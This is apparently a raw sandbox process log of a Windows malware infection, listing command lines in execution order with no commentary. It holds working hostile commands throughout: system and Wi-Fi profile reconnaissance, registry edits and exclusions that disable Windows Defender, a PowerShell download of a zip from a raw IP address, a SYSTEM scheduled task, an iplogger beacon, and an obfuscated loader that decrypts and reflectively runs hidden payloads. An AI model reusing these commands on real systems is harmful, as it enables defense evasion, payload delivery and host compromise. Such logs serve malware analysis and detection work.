C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
C:\Windows\system32\net.exe
net user
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Windows\system32\query.exe
query user
C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
C:\Windows\system32\net.exe
net localgroup
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe
"C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe
"C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\system32\ROUTE.EXE
route print
C:\Windows\system32\ARP.EXE
arp -a
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 22:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe\" PP /KQgdidVxOn 385118 /S" /V1 /F
C:\Windows\system32\NETSTAT.EXE
netstat -ano
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dbuslf.bat" "
C:\Windows\system32\sc.exe
sc query type= service state= all
C:\Windows\SysWOW64\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\system32\netsh.exe
netsh firewall show state
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn btZaCbGShXZoJDfvCg
\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn btZaCbGShXZoJDfvCg
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6
C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe PP /KQgdidVxOn 385118 /S
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffaf7bb3cb8,0x7ffaf7bb3cc8,0x7ffaf7bb3cd8
C:\Windows\system32\netsh.exe
netsh firewall show config
C:\Windows\SysWOW64\tar.exe
tar -xf putty.zip
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1924 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4528 /prefetch:1
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vYb4bUA8Zv1kMxYvRP0sAIjxZQ1BITEGl+5o22oRccc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7mk7YscC2aINMd/eWv3Jag=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Xocfa=New-Object System.IO.MemoryStream(,$param_var); $bOZJm=New-Object System.IO.MemoryStream; $ufGxK=New-Object System.IO.Compression.GZipStream($Xocfa, [IO.Compression.CompressionMode]::Decompress); $ufGxK.CopyTo($bOZJm); $ufGxK.Dispose(); $Xocfa.Dispose(); $bOZJm.Dispose(); $bOZJm.ToArray();}function execute_function($param_var,$param2_var){ $yYjBH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ftLJu=$yYjBH.EntryPoint; $ftLJu.Invoke($null, $param2_var);}$hWrPo = 'C:\Users\Admin\AppData\Local\Temp\dbuslf.bat';$host.UI.RawUI.WindowTitle = $hWrPo;$pJBjW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($hWrPo).Split([Environment]::NewLine);foreach ($TrzXq in $pJBjW) { if ($TrzXq.StartsWith('qwvMZizsyLxauvnWQoBQ')) { $drGJM=$TrzXq.Substring(20); break; }}$payloads_var=[string[]]$drGJM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
